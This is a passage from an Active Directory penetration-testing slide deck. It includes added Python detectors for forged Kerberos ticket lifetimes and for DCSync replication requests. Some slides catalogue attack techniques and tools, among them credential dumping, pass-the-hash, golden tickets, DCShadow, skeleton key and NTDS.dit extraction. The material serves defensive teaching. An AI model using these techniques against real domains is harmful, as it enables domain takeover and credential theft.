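    renewal = ticket["renew_until"] - ticket["start"]
    if life > max_ticket:
        findings.append(f"ticket life {life} exceeds policy {max_ticket}")
    if renewal > max_renewal:
        findings.append(f"renewal window {renewal} exceeds policy {max_renewal}")
    return findings


T0 = datetime(2018, 3, 1, 9, 0, 0)  # constructed issue time
TEN_YEARS_MIN = 10 * 365 * 24 * 60
TICKETS = {  # constructed samples
    "forged_default": ticket_from_minutes(T0, TEN_YEARS_MIN, TEN_YEARS_MIN),  # lifetime left at tool default
    "forged_policy":  ticket_from_minutes(T0, 600, 10080),                    # trimmed to match policy
    "legitimate":     ticket_from_minutes(T0, 600, 10080),                    # what the KDC would issue
}

if __name__ == "__main__":
    for name, ticket in TICKETS.items():
        print(name, "->", lifetime_findings(ticket) or "within policy")
```

Because "forged_policy" and "legitimate" produce the same record, lifetime is a necessary but not sufficient signal; it catches careless forgeries and nothing else.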
• 83. DCSYNC
  DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected
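The detection rule on slide 83 needs only two inputs: an inventory of the hosts that are allowed to replicate (the domain controllers) and parsed RPC calls on the DRS interface. The following added example, not from the deck, applies that rule to constructed call records. The drsuapi interface UUID and the opnum of DRSGetNCChanges are the values from the MS-DRSR specification; the addresses and the unrelated-interface placeholder UUID are constructed.

```python
"""Flag DRS replication requests that do not originate from a domain controller.

Added example (not from the slide deck). Calls are constructed records of the
kind a network sensor produces after parsing MS-RPC: source, destination,
interface UUID and opnum. Hosts are made up.
"""
DRSUAPI_UUID = "e3514235-4b06-11d1-ab04-00c04fc2dcd2"  # MS-DRSR drsuapi interface
OPNUM_GET_NC_CHANGES = 3                                 # IDL_DRSGetNCChanges

# Constructed inventory of domain controllers (in practice from AD / DNS SRV records).
DOMAIN_CONTROLLERS = {"10.0.0.1", "10.0.0.2"}

OTHER_INTERFACE = "00000000-0000-0000-0000-000000000000"  # placeholder, unrelated interface

CALLS = [  # constructed RPC call records
    {"src": "10.0.0.2",  "dst": "10.0.0.1", "uuid": DRSUAPI_UUID,    "opnum": 3},  # DC to DC: normal replication
    {"src": "10.0.0.1",  "dst": "10.0.0.2", "uuid": DRSUAPI_UUID,    "opnum": 3},
    {"src": "10.0.0.55", "dst": "10.0.0.1", "uuid": DRSUAPI_UUID,    "opnum": 0},  # DRSBind only, no data pulled
    {"src": "10.0.0.55", "dst": "10.0.0.1", "uuid": DRSUAPI_UUID,    "opnum": 3},  # workstation pulling NC changes
    {"src": "10.0.0.55", "dst": "10.0.0.1", "uuid": DRSUAPI_UUID,    "opnum": 3},  # repeated call, same pair
    {"src": "10.0.0.55", "dst": "10.0.0.1", "uuid": OTHER_INTERFACE, "opnum": 3},  # not DRS, ignored
]


def is_replication_pull(call):
    """True for a DRSGetNCChanges call on the drsuapi interface."""
    return call["uuid"].lower() == DRSUAPI_UUID and call["opnum"] == OPNUM_GET_NC_CHANGES


def detect_dcsync(calls, dcs=DOMAIN_CONTROLLERS):
    """Return the distinct (source, destination) pairs where a host that is not a
    DC asked a DC for naming-context changes, preserving first-seen order."""
    hits = []
    for call in calls:
        if is_replication_pull(call) and call["dst"] in dcs and call["src"] not in dcs:
            pair = (call["src"], call["dst"])
            if pair not in hits:
                hits.append(pair)
    return hits


def replication_pulls_by_source(calls):
    """Count DRSGetNCChanges calls per source, useful to size the data pulled."""
    counts = {}
    for call in calls:
        if is_replication_pull(call):
            counts[call["src"]] = counts.get(call["src"], 0) + 1
    return counts


if __name__ == "__main__":
    for src, dst in detect_dcsync(CALLS):
        print(f"DCSync candidate: {src} pulled NC changes from DC {dst}")
    print(replication_pulls_by_source(CALLS))
```

Keeping the DC inventory current matters more than the rule itself: a stale list either hides a rogue replicator or pages on every legitimate DC that was added after the list was written.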
• 86.
  • Plaintext creds
  • WDigest
  • SMB Mining
  • mimikittenz
  • LaZagne
  • WCMDump
  • Hash
  • Memory dump
  • ...
• 87.
  • Run as
  • NTLM Relay
  • Pass-the-hash
  • Pass-the-ticket
  • Golden ticket
  (Diagram: Logon session -> Access token: User SID, Group SIDs, Logon SID, Others...)
• 88.
  • PsExec
  • WinRM
  • AT
  • Schtasks
  • WMIC
  • SC
• 89.
  • DCSync
  • DCShadow
  • Golden ticket
  • SMB Mining
• 91.
  • NTDS.dit
    • Volume Shadow Copy
    • Ntdsutil
    • Invoke-NinjaCopy
  • Persistence
    • Golden ticket
    • Skeleton key
    • ACL-based backdoors
    • Malicious SSP
    • Password filters
    • ...
  • DSInternals
  • Impacket Secretsdump
  • Crack hashes
• 93. BUSINESS RISK
  Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk. The attacker would have unrestricted access to all resources managed by the domain: all users, servers, workstations and data. Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees.
  "Once domain admin, always domain admin"
• 94. ACKNOWLEDGMENT & REFERENCES
  • Miroslav Sotak and TVM team
  • FWHIBBIT
  • RootedCON and any other Sec Community in Spain
• 95. PENTESTING ACTIVE DIRECTORY